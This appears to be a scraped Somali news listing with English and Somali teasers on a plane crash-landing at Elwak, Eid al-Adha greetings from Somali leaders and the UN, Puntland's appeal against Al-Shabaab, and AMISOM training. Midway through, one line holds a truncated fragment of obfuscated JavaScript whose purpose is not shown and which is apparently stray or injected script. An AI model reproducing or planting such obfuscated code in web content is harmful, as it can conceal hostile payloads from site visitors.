Plane crash-lands in Somalia with over 40 passengers onboard
A plane carrying more than 40 passengers crash-landed into a military base in Gedo region, southern Somalia, early Wednesday, local officials confirmed.
Officials said the passengers were evacuated safely after a Skyward flight from Nairobi crash-landed at Burahache military camp, Elwak, Gedo region in Somalia, which is about 15 kilometers from the Somalia-Kenya border.
"No one was hurt in the incident,"...
Faah faahino kasoo baxaya shil diyaaradeed oo ka dhacay Ceelwaaq
Faah faahino dheeraad ah ayaa waxaa laga helayaa shil diyaaradeed oo saaka aroortii hore ka dhacay garoonka diyaaradaha degmada Ceelwaaq ee gobolka Gedo.
Wararka ayaa sheegaya in diyaarad sidday rakaab, isla-markaana ka timid Nairobi inay ku dhacday garoonkaasi, xilli ay ku sii jeeday degmada Elwak ee ismaamulka Mandera.
Ilo wareedyo lagu kalsoon-yahay ayaa Shabelle u sheegay in diyaaraddu ay sidday illaa...
Madaxweyne Farmaajo iyo Amiirka Qatar oo is-weydaarsaday Hambalyada Ciida
Madaxweynaha Jamhuuriyadda Federaaalka Soomaaliya Mudane Maxmaed Cabdullaahi Farmaajo, oo khadka taleefanka kula hadlay Amiirka Dalka Qatar, Sheekh Tamiim bin Xamad Al Thani, ayaa ugu hambalyeyay munaasabadda Ciidda barakeysan ee Ciidul Adxa.
Madaxweynaha iyo Amiirka ayaa isweydaarsiga hambalyada kaddib u rajeeyay labada dal iyo dhammaan Muslimiinta horumar iyo barwaaqo inay ku gaaraan sanadkan kiisa kale.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const...
Puntland oo baaq u dirtay Ganacsatada ku dhaqan Gobolka Mudug
Guddoomiyaha Gobolka Mudug ee Puntland ayaa u sheegay ganacsatada inay qeyb ka noqdaan la dagaallanka Al-Shabaab, isla markaana uga digay inay siiyaan lacago baad ah.
Cabdaladhiif Muuse Nuur Guddoomiyaha Gobolka Mudug ee Puntland oo la hadlayay Laanta Afka Soomaaliga ee VOA ayaa hoosta ka xariiqay in xididada ay u siibeen Shabakadii u qaabilsaneyd Al-Shabaab dilalka qorsheysan ee ka dhaca gudaha...
Xaafadda Daarusalaam ee Muqdisho oo si weyn looga ciiday (SAWIRRO)
Iyadoo maanta geyiga Soomaalida laga ciidayo maalinta 1aad ee Ciidul Adxa ayaa munaasabadeeda laga dareemay xaafadda Daarusalaam ee Magaalada Muqdisho.
Boqolaal ka mid ah dadka deegaanka iyo qaar kale oo magaalada isaga kala yimid ayaa Salaadda Ciidda ku oogay barxadda weyn ee Daarusalaam.
Xaafadan oo sanadihii ugu dambeeyay aad u dhismeysay ayaa waxaa ku yaala oo laga hirgeliyay beerta xayawaanaadka iyo...
A/Madoobe oo hambalyada munaasabada Ciidda Carafo u diray Ummadda Soomaaliyeed
Madaxweynaha dowlad goboleedka Jubbaland Mudane Axmed Maxamed Islaam ayaa guud ahaan shacabka reer Jubbaland, Ummada Soomaaliyeey iyo Muslimiinta Caalamka ugu hambalyeeyay maalmaha barakaysan ee munaasabadda ciidda carafo.
Madaxweynaha Jubbaland ayaa tilmaamay in maalmahan barakaysan ay ku weyn yihiin Bulshada islaamka isla markana gudashada waajibkaadka xajka ee sanad walba maanta oo kale loo dareeri jiray uu sanadkan saamayn ku leeyahay xanuunka...
QM oo hambalyada Ciidul Adxa u dirtay Ummadda Soomaaliyeed
War saxaafadeed ka soo baxay Xafiiska Wakiilka Gaarka ah ee Xoghayaha Guud ee Qaramada Midoobay u qaabilsan Soomaaliya Danjire James Swan ayaa hambalyo ku aaadan muanasabadda ciidul Adxaa u diray shacabka Soomaaliyeed.
Bahda Qaramada Midoobay ee Soomaaliya waxay dhammaan Soomaalida u rajaynayaan “Ciid Wanaagsan.”
“Hambalyo diirran oo ku aaddan Ciidul Adxaa ayaa idin kaga imaanaysa bahda Qaramada Midoobay ee Soomaaliya,” ayuu...
Rooble oo shacabka Soomaaliyeed ugu hambalyeeyey munaasabadda ciidul Adxa
Ra’iisul Wasaaraha Xukumadda Federaalka Soomaaliya Mudane Maxamed Xuseen Rooble ayaa Shacabka Soomaaliyeed ugu Hambalyeeyay munaasabadd Ciidul Adxa oo berri ku beegan.
“Dhamaan shacuubta Islaamka, gaar ahaan shacabka Soomaaliyeed meelkasta oo aad joogtaan waxaan rabaa inaan halkan idinkaga hambalyeeyo ciida barakeysan ee ciidul Adxa, waxaan idin leeyahay ciid wanaagsan”. ayuu yiri Ra’iisul Wasaare Rooble.
Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Maxamed Xuseen...
Farmaajo oo ugu hambalyeeyay shacabka Soomaaliyeed Ciidda Carafo
Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo ayaa hambalyo ku aaddan Ciidda Carafo u diray Shacabka Soomaaliyeed iyo Muslimiinta Caalamka ee u dabbaal-degaya farxadda Ciiddan.
Madaxweynaha ayaa tilmaamay fadliga ay leeyihiin maalmahan barakaysan ee Ciidda Carafo, waxa uuna ku bogaadiyey dadka Soomaaliyeed in ay is kaalmeeyaan, kana shaqeeyaan danta guud oo amnigu uu ugu horreeyo.
“Waxaan ku boorrinayaa dadka Soomaaliyeed,...
AMISOM and SNA officers conclude training on civil-military cooperation
Officers serving under the African Union Mission in Somalia, AMISOM, and the Somali National Army, SNA, have completed a five-day joint training to enhance their knowledge on the role of Civil-Military Cooperation, CIMIC, in peace support operations.
The five-day training, organised by the AMISOM Force Headquarters in coordination with the UK-Mission Support Team, UK-MST, was attended by CIMIC officers from...











